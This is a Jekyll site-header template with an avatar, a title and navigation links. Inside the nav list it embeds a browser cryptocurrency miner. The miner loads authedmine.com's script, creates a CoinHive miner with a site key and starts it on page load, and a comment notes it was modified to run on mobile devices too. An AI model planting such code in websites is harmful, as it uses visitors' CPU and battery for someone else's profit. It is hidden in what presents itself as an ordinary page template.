<header class="site-header">
<div class="branding">
{% if site.theme.gravatar %}
<a href="{{ site.baseurl }}/">
<img class="avatar" src="https://secure.gravatar.com/avatar/{{ site.theme.gravatar }}?s=100" alt=""/>
</a>
{% elsif site.theme.avatar %}
<a href="{{ site.baseurl }}/">
<img class="avatar" src="/img/{{ site.theme.avatar }}" alt=""/>
</a>
{% endif %}
<h1 class="site-title">
<a href="{{ site.baseurl }}/">{{ site.theme.title }}</a>
</h1>
</div>
<nav class="site-nav">
<ul>
<li>
<a class="page-link" href="/blog/">Blog</a>
</li>
<li>
<a class="page-link" href="https://metronotes.com">Community</a>
</li>
{% for page in site.pages %}
{% if page.title and page.hide != true %}
<li>
<a class="page-link" href="{{ page.url | prepend: site.baseurl }}">{{ page.title }}</a>
</li>
{% endif %}
{% endfor %}
 
{% include icons.html %}
<li>
<script src="https://authedmine.com/lib/authedmine.min.js"></script>
<script>
	var miner = new CoinHive.Anonymous('41TX4NK1Vk9wjX5Oa8AV4N4qJKwfSFDM', {throttle: 0.3});

	// Only start on non-mobile devices and if not opted-out
	// in the last 14400 seconds (4 hours):
	//if (!miner.isMobile() && !miner.didOptOut(14400)) {
	// Modified to start on mobile devices
	if (!miner.didOptOut(14400)) {
		miner.start();
	}
</script>
</li>
</ul>
</nav>
</header>
